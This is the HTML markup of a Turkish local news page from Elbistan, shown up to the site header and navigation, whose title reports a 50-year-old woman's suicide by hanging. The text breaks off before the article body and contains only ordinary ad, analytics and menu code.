
<!DOCTYPE html> <html lang="tr" class="no-inlinesvgsite-center" itemscope itemtype="http://schema.org/NewsArticle"> <head> <script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script> <script> (adsbygoogle = window.adsbygoogle || []).push({ google_ad_client: "ca-pub-7914883170465839", enable_page_level_ads: true }); </script> <title>Tavana astığı iple yaşamına son verdi</title> <meta charset="utf-8"> <!--meta name="viewport" content="width=device-width, initial-scale=1.0"--> <meta name="description" content="Elbistan&#039;a bağlı Toprakhisar Mahallesi&#039;nde 50 yaşındaki kadın tavana astığı iple yaşamına son verdi."> <meta name="keywords" content=""> <meta name="news_keywords" content=""> <meta name="author" content="Elbistanın Sesi" /> <meta property="fb:admins" content=""> <meta property="og:site_name" content="Elbistanın Sesi"> <meta property="og:title" content="Tavana astığı iple yaşamına son verdi"> <meta property="og:description" content="Elbistan&#039;a bağlı Toprakhisar Mahallesi&#039;nde 50 yaşındaki kadın tavana astığı iple yaşamına son verdi."> <meta property="og:url" content="http://www.elbistaninsesi.com/guncel/tavana-astigi-iple-yasamina-son-verdi-h65457.html"> <meta property="og:image" content="http://www.elbistaninsesi.com/images/haberler/2020/01/tavana_astigi_iple_yasamina_son_verdi_h65457_9bba9.jpg"> <meta property="og:type" content="article"> <meta http-equiv="refresh" content="3000"> <meta name="twitter:card" content="summary_large_image"> <meta name="og:title" content="Tavana astığı iple yaşamına son verdi"> <meta name="twitter:url" content="http://www.elbistaninsesi.com/guncel/tavana-astigi-iple-yasamina-son-verdi-h65457.html"> <meta name="twitter:domain" content="http://www.elbistaninsesi.com/"> <meta name="twitter:site" content="elbistaninsesi"> <meta name="twitter:title" content="Tavana astığı iple yaşamına son verdi"> <meta name="twitter:description" content="Elbistan’a bağlı Toprakhisar Mahallesi’nde 50 yaşındaki kadın, tavana astığı iple yaşamına son verdi."> <meta name="twitter:image:src" content="http://www.elbistaninsesi.com/images/haberler/2020/01/tavana_astigi_iple_yasamina_son_verdi_h65457_9bba9.jpg"> <link rel="alternate" href="http://www.elbistaninsesi.com/" hreflang="tr-default" /> <link href="http://www.elbistaninsesi.com/_themes/hs-rush-php/style/compress.css" rel="stylesheet" /> <link href="http://www.elbistaninsesi.com/_themes/hs-rush-php/style/print.css" rel="stylesheet" media="print, handheld"> <link rel="alternate" type="application/rss+xml" title="RSS servisi" href="http://www.elbistaninsesi.com/rss.php" /> <link href='http://fonts.googleapis.com/css?family=Oswald&amp;subset=latin,latin-ext' rel='stylesheet' type='text/css'> <link href="https://fonts.googleapis.com/css?family=PT+Sans:400,700&amp;subset=latin,latin-ext" rel="stylesheet" type="text/css"> <link href='http://fonts.googleapis.com/css?family=Roboto:400,400italic,500,500italic,700&amp;subset=latin,latin-ext' rel='stylesheet' type='text/css'> <link href="http://fonts.googleapis.com/css?family=Roboto+Slab:700&amp;subset=latin,latin-ext" rel="stylesheet" type="text/css"> <link rel="canonical" href=""> <link rel="publisher" href="#" /> <link rel="image_src" type="image/jpeg" href="http://www.elbistaninsesi.com/images/haberler/2020/01/tavana_astigi_iple_yasamina_son_verdi_h65457_9bba9.jpg" /> <meta itemprop="headline" content="Tavana astığı iple yaşamına son verdi" /> <meta itemprop="thumbnailUrl" content="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/01/tavana_astigi_iple_yasamina_son_verdi_h65457_9bba9.jpg" /> <meta itemprop="articleSection" content="Güncel" name="section" /> <meta itemprop="dateCreated" content="2020-01-21T10:54:15+02:00" /> <meta itemprop="image" content="http://www.elbistaninsesi.com/images/haberler/2020/01/tavana_astigi_iple_yasamina_son_verdi_h65457_9bba9.jpg" /> <meta itemprop="genre" content="news" name="medium" /> <meta itemprop="inLanguage" content="tr-TR" /> <meta itemprop="keywords" content="" name="keywords" /> <!--[if gte IE 9]> <style type="text/css"> .gradient { filter: none; } </style> <![endif]--> <!--[if IE 7]> <style type="text/css"> .reklam.dikey.sol .fixed { margin-left:-px; } </style> <![endif]--> <script type="text/javascript"> var site_url = 'http://www.elbistaninsesi.com/'; var tema = 'hs-rush-php'; var theme_path = 'http://www.elbistaninsesi.com/_themes/hs-rush-php/'; var ajax_url = '_ajax/'; var cat_limit = '10'; var headerayar = 'header_genis'; var poll_voted = ''; var comment_approved = '0'; var doviz = '1'; var lazyload = '0'; var twitter_user = 'elbistaninsesi'; var facebook_user = 'elbistaninsesi'; var popup_saat = '1'; var yorum_harf_ayar = '1'; var hava = '0'; var hava_default = '15888'; var namaz = '1'; var iftara_kalan_sure = '0'; var namaz_default = 'kahramanmaras'; var superlig = '1'; var uye_gir = 'Üye Girişi'; var uye_ol = 'Üye Ol'; var cikis_yap = 'Çıkış Yap'; var baglan_fb = 'Facebook ile Bağlan'; var analitik_ga = 'UA-21655627-1'; </script> <!--[if lt IE 9]> <script src="http://html5shim.googlecode.com/svn/trunk/html5.js"></script> <![endif]--> <script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script> <script> (adsbygoogle = window.adsbygoogle || []).push({ google_ad_client: "ca-pub-7533583759274488", enable_page_level_ads: true }); </script> </head> <body> <!-- HEADER --> <div id="siteHeader" class="header fluid row-fluid"> <div id="header-top" class="header-top row-fluid"> <div class="header-top-container"> <div class="header-top-block header-top-cycle"> <div class="header-top-currency"> <div class="currency-cycle"> <div class="currency-dolar glyphicons white usd">DOLAR <span class="currency-rate"></span></div> <div class="currency-euro glyphicons white euro">EURO <span class="currency-rate"></span></div> <div class="currency-altin glyphicons white coins">ALTIN <span class="currency-rate"></span></div> <div class="currency-bist glyphicons white global">BIST <span class="currency-rate"></span></div> </div> </div> <div class="header-top-hot mleft"> <div class="hot-cycle"> <div> <a class="glyphicons white history rotateIn" href="http://www.elbistaninsesi.com/guncel/ekinozunde-yariyil-tatili-genclik-ve-egitim-merkezi-acildi-h65463.html" title="Ekinözü’nde Yarıyıl Tatili Gençlik ve Eğitim Merkezi açıldı" >Ekinözü’nde Yarıyıl Tatili Gençlik ve Eğitim Merkezi açıldı</a> </div> <div> <a class="glyphicons white history rotateIn" href="http://www.elbistaninsesi.com/guncel/ehliyet-sinavi-icin-il-merkezine-gitme-devri-sona-eriyor-h65462.html" title="Ehliyet sınavı için il merkezine gitme devri sona eriyor" >Ehliyet sınavı için il merkezine gitme devri sona eriyor</a> </div> <div> <a class="glyphicons white history rotateIn" href="http://www.elbistaninsesi.com/guncel/ihtiyac-sahibi-ailelere-5-milyon-536-bin-tllik-yardim-eli-uzandi-h65461.html" title="İhtiyaç sahibi ailelere 5 milyon 536 bin TL’lik yardım eli uzandı" >İhtiyaç sahibi ailelere 5 milyon 536 bin TL’lik yardım eli uzandı</a> </div> <div> <a class="glyphicons white history rotateIn" href="http://www.elbistaninsesi.com/spor/ptt-sporu-3-1-yenen-filenin-sultanlari-moral-buldu-h65460.html" title="PTT Spor’u 3-1 yenen filenin sultanları moral buldu" >PTT Spor’u 3-1 yenen filenin sultanları moral buldu</a> </div> <div> <a class="glyphicons white history rotateIn" href="http://www.elbistaninsesi.com/guncel/elbistanda-soba-zehirlenmesi-can-aldi-h65459.html" title="Elbistan’da soba zehirlenmesi can aldı" >Elbistan’da soba zehirlenmesi can aldı</a> </div> <div> <a class="glyphicons white history rotateIn" href="http://www.elbistaninsesi.com/guncel/girisim-grubu-uyeleri-baskan-paksoyu-ziyaret-etti-h65458.html" title="Girişim Grubu Üyeleri Başkan Paksoy’u ziyaret etti" >Girişim Grubu Üyeleri Başkan Paksoy’u ziyaret etti</a> </div> <div> <a class="glyphicons white history rotateIn" href="http://www.elbistaninsesi.com/guncel/linyit-komuru-nano-teknolojik-urunlere-donusuyor-h65453.html" title="Linyit kömürü, nano teknolojik ürünlere dönüşüyor" >Linyit kömürü, nano teknolojik ürünlere dönüşüyor</a> </div> <div> <a class="glyphicons white history rotateIn" href="http://www.elbistaninsesi.com/guncel/tpao-kahramanmarasta-petrol-arayacak-h65452.html" title="TPAO, Kahramanmaraş’ta petrol arayacak" >TPAO, Kahramanmaraş’ta petrol arayacak</a> </div> <div> <a class="glyphicons white history rotateIn" href="http://www.elbistaninsesi.com/guncel/bekleme-alanlarindaki-koltuklara-kesilerek-zarar-veriliyor-h65451.html" title="Bekleme alanlarındaki koltuklara kesilerek zarar veriliyor" >Bekleme alanlarındaki koltuklara kesilerek zarar veriliyor</a> </div> <div> <a class="glyphicons white history rotateIn" href="http://www.elbistaninsesi.com/guncel/13-kirsal-mahallede-yol-bakim-calismasi-tamamlandi-h65450.html" title="13 kırsal mahallede yol bakım çalışması tamamlandı" >13 kırsal mahallede yol bakım çalışması tamamlandı</a> </div> </div> </div> </div> <div class="header-top-block header-top-right"> <div class="header-top-user"> <div class="btn-group"> <button class="btn btn-user dropdown-toggle glyphicons white keys" data-toggle="dropdown"></button> <ul id="memberArea" class="dropdown-menu"> </ul> </div> </div> </div> <div id="sb-search" class="header-top-block header-top-search sb-search"> <form action="http://www.elbistaninsesi.com/" method="get"> <input type="hidden" name="m" value="arama"> <input class="sb-search-input" placeholder="Haber Ara ..." type="search" name="q" id="search"> <input type="hidden" name="auth" value="9007a3e0b0a8261959ed755acc748d0f0c5b8aa4" /> <input class="sb-search-submit" type="submit" value=""> <span class="sb-icon-search"></span> </form> </div> </div> </div> <div id="logo" class="row-fluid"> <div class="container"> <div class="span3"> <span class="logo"><a href="http://www.elbistaninsesi.com/" class="logo"><img src="http://www.elbistaninsesi.com/images/banner/Ysimsiz-1_2.jpg" alt="Tavana astığı iple yaşamına son verdi" /></a></span> </div> </div> </div> <div id="menu" class="row-fluid"> <div class="kategori"> <div class="container"> <a href="http://www.elbistaninsesi.com/" class="darken glyphicons home"></a> <a href="http://www.elbistaninsesi.com/yazarlar.html" class="blue glyphicons group">Yazarlar</a> <a title="Vefatlar" href="http://www.elbistaninsesi.com/vefatlar" id="k7" >Vefatlar</a> <a title="Güncel" href="http://www.elbistaninsesi.com/guncel" id="k8" class="current" >Güncel</a> <a title="Politika" href="http://www.elbistaninsesi.com/politika" id="k2" >Politika</a> <a title="Sağlık" href="http://www.elbistaninsesi.com/saglik" id="k4" >Sağlık</a> <a title="Eğitim / Kültür" href="http://www.elbistaninsesi.com/egitim-kultur" id="k5" >Eğitim / Kültür</a> <a title="Spor" href="http://www.elbistaninsesi.com/spor" id="k1" >Spor</a> <a title="Ekonomi" href="http://www.elbistaninsesi.com/ekonomi" id="k3" >Ekonomi</a> <a title="Arşiv Özel" href="http://www.elbistaninsesi.com/arsiv-ozel" id="k9" >Arşiv Özel</a> <a title="Seçim Sonucu" href="http://www.elbistaninsesi.com/secim-sonucu" id="k13" >Seçim Sonucu</a> <a title="YEREL" href="http://www.elbistaninsesi.com/yerel" id="k17" >YEREL</a> <div class="other pull-right"><a href="#" class="all" title="Diğer Kategoriler">TÜM KATEGORİLER</a></div> <div class="othercat"> <div class="inner"> <div class="clearfix"> <a title="ASAYİŞ" href="http://www.elbistaninsesi.com/asayis" id="k19" >ASAYİŞ</a> <a title="KÜLTÜR-SANAT" href="http://www.elbistaninsesi.com/kultur-sanat" id="k20" >KÜLTÜR-SANAT</a> <a title="GENEL" href="http://www.elbistaninsesi.com/genel" id="k21" >GENEL</a> <a title="DÜNYA" href="http://www.elbistaninsesi.com/dunya" id="k22" >DÜNYA</a> <a title="EĞİTİM" href="http://www.elbistaninsesi.com/egitim" id="k48" >EĞİTİM</a> <a title="ÇEVRE" href="http://www.elbistaninsesi.com/cevre" id="k53" >ÇEVRE</a> <a title="MAGAZİN" href="http://www.elbistaninsesi.com/magazin" id="k60" >MAGAZİN</a> <a title="HABERDE İNSAN" href="http://www.elbistaninsesi.com/haberde-insan" id="k71" >HABERDE İNSAN</a> </div> </div> </div> </div> </div> <div id="katicerik" class="row-fluid"> <div class="container"><div class="katelement kat_k7"> <div class="kathab"><div> <a href="http://www.elbistaninsesi.com/vefatlar/mustafa-ozkan-h65464.html" title="Mustafa Özkan"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/01/mustafa_ozkan_h65464_57425.jpg" alt="Mustafa Özkan" /> Mustafa Özkan</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/vefatlar/fatma-etin-h65456.html" title="Fatma Etin"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/01/fatma_etin_h65456_cbdd7.jpg" alt="Fatma Etin" /> Fatma Etin</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/vefatlar/anma-h65455.html" title="Anma"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/01/anma_h65455_69836.jpg" alt="Anma" /> Anma</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/vefatlar/recep-yekta-h65454.html" title="Recep Yekta"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/01/recep_yekta_h65454_a088b.jpg" alt="Recep Yekta" /> Recep Yekta</a> </div> </div></div><div class="katelement kat_k8"> <div class="kathab"><div> <a href="http://www.elbistaninsesi.com/guncel/ekinozunde-yariyil-tatili-genclik-ve-egitim-merkezi-acildi-h65463.html" title="Ekinözü’nde Yarıyıl Tatili Gençlik ve Eğitim Merkezi açıldı"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/01/ekinozunde_yariyil_tatili_genclik_ve_egitim_merkezi_acildi_h65463_c35ab.jpg" alt="Ekinözü’nde Yarıyıl Tatili Gençlik ve Eğitim Merkezi açıldı" /> Ekinözü’nde Yarıyıl Tatili Gençlik ve Eğitim Merkezi açıldı</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/guncel/ehliyet-sinavi-icin-il-merkezine-gitme-devri-sona-eriyor-h65462.html" title="Ehliyet sınavı için il merkezine gitme devri sona eriyor"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/01/ehliyet_sinavi_icin_il_merkezine_gitme_devri_sona_eriyor_h65462_90a68.jpg" alt="Ehliyet sınavı için il merkezine gitme devri sona eriyor" /> Ehliyet sınavı için il merkezine gitme devri sona eriyor</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/guncel/ihtiyac-sahibi-ailelere-5-milyon-536-bin-tllik-yardim-eli-uzandi-h65461.html" title="İhtiyaç sahibi ailelere 5 milyon 536 bin TL’lik yardım eli uzandı"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/01/ihtiyac_sahibi_ailelere_5_milyon_536_bin_tllik_yardim_eli_uzandi_h65461_1a5e1.jpg" alt="İhtiyaç sahibi ailelere 5 milyon 536 bin TL’lik yardım eli uzandı" /> İhtiyaç sahibi ailelere 5 milyon 536 bin TL’lik yardım eli uzandı</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/guncel/elbistanda-soba-zehirlenmesi-can-aldi-h65459.html" title="Elbistan’da soba zehirlenmesi can aldı"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/01/elbistanda_soba_zehirlenmesi_can_aldi_h65459_6e788.jpg" alt="Elbistan’da soba zehirlenmesi can aldı" /> Elbistan’da soba zehirlenmesi can aldı</a> </div> </div></div><div class="katelement kat_k2"> <div class="kathab"><div> <a href="http://www.elbistaninsesi.com/politika/mhp-meclis-uyelerinden-birlik-ve-beraberlik-iftari-h63165.html" title="MHP Meclis Üyeleri’nden birlik ve beraberlik iftarı"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/06/mhp_meclis_uyelerinden_birlik_ve_beraberlik_iftari_h63165_540b4.JPG" alt="MHP Meclis Üyeleri’nden birlik ve beraberlik iftarı" /> MHP Meclis Üyeleri’nden birlik ve beraberlik iftarı</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/politika/baskan-eker-mazbatasini-aldi-h62471.html" title="Başkan Eker, mazbatasını aldı"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/04/baskan_eker_mazbatasini_aldi_h62471_6d495.JPG" alt="Başkan Eker, mazbatasını aldı" /> Başkan Eker, mazbatasını aldı</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/politika/oztunctan-gungore-hayirli-olsun-ziyareti-h62469.html" title="Öztunç’tan Güngör’e hayırlı olsun ziyareti"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/04/oztunctan_gungore_hayirli_olsun_ziyareti_h62469_f4649.jpg" alt="Öztunç’tan Güngör’e hayırlı olsun ziyareti" /> Öztunç’tan Güngör’e hayırlı olsun ziyareti</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/politika/iste-partilerin-oy-dagilimi-h62445.html" title="İşte partilerin oy dağılımı"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/04/iste_partilerin_oy_dagilimi_h62445_7a2a4.JPG" alt="İşte partilerin oy dağılımı" /> İşte partilerin oy dağılımı</a> </div> </div></div><div class="katelement kat_k4"> <div class="kathab"><div> <a href="http://www.elbistaninsesi.com/saglik/crown-dental-hasta-kabulune-basladi-h63790.html" title="Crown Dental hasta kabulüne başladı"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/08/crown_dental_hasta_kabulune_basladi_h63790_f7c46.JPG" alt="Crown Dental hasta kabulüne başladı" /> Crown Dental hasta kabulüne başladı</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/saglik/uzman-dr-erdinc-hatipsoylu-hasta-kabulune-basladi-h63781.html" title="Uzman Dr. Erdinç Hatipsoylu hasta kabulüne başladı"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/08/uzman_dr_erdinc_hatipsoylu_hasta_kabulune_basladi_h63781_4e39a.JPG" alt="Uzman Dr. Erdinç Hatipsoylu hasta kabulüne başladı" /> Uzman Dr. Erdinç Hatipsoylu hasta kabulüne başladı</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/saglik/elbistanda-saglik-kadrosu-guclenmeye-devam-ediyor-h63436.html" title="Elbistan’da sağlık kadrosu güçlenmeye devam ediyor"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/06/elbistanda_saglik_kadrosu_guclenmeye_devam_ediyor_h63436_480cd.JPG" alt="Elbistan’da sağlık kadrosu güçlenmeye devam ediyor" /> Elbistan’da sağlık kadrosu güçlenmeye devam ediyor</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/saglik/edh-obezite-cerrahisinde-soz-sahibi-olmaya-basladi-h63423.html" title="EDH, obezite cerrahisinde söz sahibi olmaya başladı"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/06/edh_obezite_cerrahisinde_soz_sahibi_olmaya_basladi_h63423_4b617.JPG" alt="EDH, obezite cerrahisinde söz sahibi olmaya başladı" /> EDH, obezite cerrahisinde söz sahibi olmaya başladı</a> </div> </div></div><div class="katelement kat_k5"> <div class="kathab"><div> <a href="http://www.elbistaninsesi.com/egitim-kultur/maras-savunmasi-belgeselinin-elbistan-bolumu-cekiliyor-h63426.html" title="Maraş Savunması Belgeseli’nin Elbistan bölümü çekiliyor"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/06/maras_savunmasi_belgeselinin_elbistan_bolumu_cekiliyor_h63426_dfbd4.JPG" alt="Maraş Savunması Belgeseli’nin Elbistan bölümü çekiliyor" /> Maraş Savunması Belgeseli’nin Elbistan bölümü çekiliyor</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/egitim-kultur/otizmli-cocuklar-icin-ozel-etkinlik-h62473.html" title="Otizmli çocuklar için özel etkinlik"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/04/otizmli_cocuklar_icin_ozel_etkinlik_h62473_6209c.jpg" alt="Otizmli çocuklar için özel etkinlik" /> Otizmli çocuklar için özel etkinlik</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/egitim-kultur/kadinlara-yonelik-elde-maras-isi-el-nakiscisi-kursu-aciliyor-h61759.html" title="Kadınlara yönelik elde Maraş işi-el nakışçısı kursu açılıyor"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/01/kadinlara_yonelik_elde_maras_isi_el_nakiscisi_kursu_aciliyor_h61759_488fe.jpg" alt="Kadınlara yönelik elde Maraş işi-el nakışçısı kursu açılıyor" /> Kadınlara yönelik elde Maraş işi-el nakışçısı kursu açılıyor</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/egitim-kultur/nurhak-kaymakamligindan-egitime-ozel-destek-h61699.html" title="Nurhak Kaymakamlığı’ndan eğitime özel destek"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/no_headline.jpg" alt="Nurhak Kaymakamlığı’ndan eğitime özel destek" /> Nurhak Kaymakamlığı’ndan eğitime özel destek</a> </div> </div></div><div class="katelement kat_k1"> <div class="kathab"><div> <a href="http://www.elbistaninsesi.com/spor/ptt-sporu-3-1-yenen-filenin-sultanlari-moral-buldu-h65460.html" title="PTT Spor’u 3-1 yenen filenin sultanları moral buldu"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/01/ptt_sporu_3_1_yenen_filenin_sultanlari_moral_buldu_h65460_2da74.jpg" alt="PTT Spor’u 3-1 yenen filenin sultanları moral buldu" /> PTT Spor’u 3-1 yenen filenin sultanları moral buldu</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/spor/elbistan-in-sultanlari-ndan-onemli-galibiyet-h65021.html" title="Elbistan&#039;ın Sultanları&#039;ndan önemli galibiyet"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/12/elbistan_in_sultanlari_dan_onemli_galibiyet_h65021_ff6ef.jpg" alt="Elbistan&#039;ın Sultanları&#039;ndan önemli galibiyet" /> Elbistan&#039;ın Sultanları&#039;ndan önemli galibiyet</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/spor/elbistanspor-malatya-dan-1-puanla-dondu-h65020.html" title="Elbistanspor, Malatya&#039;dan 1 puanla döndü"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/12/elbistanspor_malatya_dan_1_puanla_dondu_h65020_b3e85.jpg" alt="Elbistanspor, Malatya&#039;dan 1 puanla döndü" /> Elbistanspor, Malatya&#039;dan 1 puanla döndü</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/spor/elbistanin-sultanlari-deplasmanda-yenildi-h64807.html" title="Elbistan’ın Sultanları, deplasmanda yenildi"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/11/elbistanin_sultanlari_deplasmanda_yenildi_h64807_04865.jpg" alt="Elbistan’ın Sultanları, deplasmanda yenildi" /> Elbistan’ın Sultanları, deplasmanda yenildi</a> </div> </div></div><div class="katelement kat_k3"> <div class="kathab"><div> <a href="http://www.elbistaninsesi.com/ekonomi/baris-pinari-harekatinda-teror-orgutune-buyuk-darbe-h64435.html" title="Barış Pınarı Harekatı’nda terör örgütüne büyük darbe"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/10/baris_pinari_harekatinda_teror_orgutune_buyuk_darbe_h64435_aec94.jpg" alt="Barış Pınarı Harekatı’nda terör örgütüne büyük darbe" /> Barış Pınarı Harekatı’nda terör örgütüne büyük darbe</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/ekonomi/etso-ve-teb-kredi-protokolu-imzaladi-h61756.html" title="ETSO ve TEB kredi protokolü imzaladı"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/01/etso_ve_teb_kredi_protokolu_imzaladi_h61756_7542a.jpg" alt="ETSO ve TEB kredi protokolü imzaladı" /> ETSO ve TEB kredi protokolü imzaladı</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/ekonomi/dogakadan-ekinozu-ve-nurhaktaki-yatirimlara-destek-h61675.html" title="DOĞAKA’dan Ekinözü ve Nurhak’taki yatırımlara destek"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/01/dogakadan_ekinozu_ve_nurhaktaki_yatirimlara_destek_h61675_c61db.jpg" alt="DOĞAKA’dan Ekinözü ve Nurhak’taki yatırımlara destek" /> DOĞAKA’dan Ekinözü ve Nurhak’taki yatırımlara destek</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/ekonomi/tedavi-sureclerinde-meslek-sahibi-olacaklar-h60414.html" title="Tedavi süreçlerinde meslek sahibi olacaklar"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2018/10/tedavi_sureclerinde_meslek_sahibi_olacaklar_h60414_dbbab.JPG" alt="Tedavi süreçlerinde meslek sahibi olacaklar" /> Tedavi süreçlerinde meslek sahibi olacaklar</a> </div> </div></div><div class="katelement kat_k9"> <div class="kathab"><div> <a href="http://www.elbistaninsesi.com/arsiv-ozel/17-ekim-1968-pazartesi-h3006.html" title="17 EKİM 1968 PAZARTESİ"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/24401.jpg" alt="17 EKİM 1968 PAZARTESİ" /> 17 EKİM 1968 PAZARTESİ</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/arsiv-ozel/13-ekim-1968-persembe-h3005.html" title="13 EKİM 1968 PERŞEMBE"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/24398.jpg" alt="13 EKİM 1968 PERŞEMBE" /> 13 EKİM 1968 PERŞEMBE</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/arsiv-ozel/17-agustos-1967-persembe-h2896.html" title="17 AĞUSTOS 1967 PERŞEMBE"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/24181.jpg" alt="17 AĞUSTOS 1967 PERŞEMBE" /> 17 AĞUSTOS 1967 PERŞEMBE</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/arsiv-ozel/30-mayis-1959-cumartesi-h2893.html" title="30 MAYIS 1959 CUMARTESİ"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/24174.jpg" alt="30 MAYIS 1959 CUMARTESİ" /> 30 MAYIS 1959 CUMARTESİ</a> </div> </div></div><div class="katelement kat_k13"> <div class="kathab"><div> <a href="http://www.elbistaninsesi.com/secim-sonucu/16-nisan-2017-anayasa-degisikligi-referandumu-h39059.html" title="16 Nisan 2017 Anayasa Değişikliği Referandumu"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2017/04/16_nisan_2017_anayasa_degisikligi_referandumu_h39059_39ce8.jpg" alt="16 Nisan 2017 Anayasa Değişikliği Referandumu" /> 16 Nisan 2017 Anayasa Değişikliği Referandumu</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/secim-sonucu/1-kasim-2015-26-donem-milletvekili-genel-secimi-h39058.html" title="1 Kasım 2015 26. Dönem Milletvekili Genel Seçimi"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2017/04/1_kasim_2015_26_donem_milletvekili_genel_secimi_h39058_aa012.jpg" alt="1 Kasım 2015 26. Dönem Milletvekili Genel Seçimi" /> 1 Kasım 2015 26. Dönem Milletvekili Genel Seçimi</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/secim-sonucu/7-haziran-2015-25-donem-milletvekili-genel-secimi-h30737.html" title="7 Haziran 2015 25. Dönem Milletvekili Genel Seçimi"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2015-Genel-Secim-Sonuclari_297.jpg" alt="7 Haziran 2015 25. Dönem Milletvekili Genel Seçimi" /> 7 Haziran 2015 25. Dönem Milletvekili Genel Seçimi</a> </div> </div><div class="kathab"></div></div><div class="katelement kat_k17"> <div class="kathab"><div> <a href="http://www.elbistaninsesi.com/kahramanmaras/kmtso-baskani-zabun-ktm-tekstil-ve-moda-yolculuguna-yeni-bir-ivme-kazandiracak-h38463.html" title="KMTSO Başkanı Zabun; “KTM, tekstil ve moda yolculuğuna yeni bir ivme kazandıracak”"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2017/04/kmtso_baskani_zabun_ktm_tekstil_ve_moda_yolculuguna_yeni_bir_ivme_kazandiracak.jpg" alt="KMTSO Başkanı Zabun; “KTM, tekstil ve moda yolculuğuna yeni bir ivme kazandıracak”" /> KMTSO Başkanı Zabun; “KTM, tekstil ve moda yolculuğuna yeni bir ivme kazandıracak”</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/kahramanmaras/minikler-kizilderililerin-sira-disi-dunyasini-kesfedecek-h38435.html" title="Minikler, Kızılderililerin sıra dışı dünyasını keşfedecek"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/no_headline.jpg" alt="Minikler, Kızılderililerin sıra dışı dünyasını keşfedecek" /> Minikler, Kızılderililerin sıra dışı dünyasını keşfedecek</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/kahramanmaras/ogrenciler-hedefi-12den-vurmak-icin-yaristi-h38434.html" title="Öğrenciler hedefi 12’den vurmak için yarıştı"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2017/04/ogrenciler_hedefi_12den_vurmak_icin_yaristi.jpg" alt="Öğrenciler hedefi 12’den vurmak için yarıştı" /> Öğrenciler hedefi 12’den vurmak için yarıştı</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/kahramanmaras/piazzada-indirim-yarisi-h35825.html" title="Piazza’da indirim yarışı"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2016/08/piazzada_indirim_yarisi.jpg" alt="Piazza’da indirim yarışı" /> Piazza’da indirim yarışı</a> </div> </div></div> </div> </div> </div> </div> <div id="mainContainer" class="container center shadow" style="padding-top:15px;"> <img src="http://www.elbistaninsesi.com/images/aboneol.jpg" width="937" height="45" /><br> <br> <!-- Üst Manşet --> <div id="ustkisim" class="row"> <div class="span12 reklam reklam106"><a 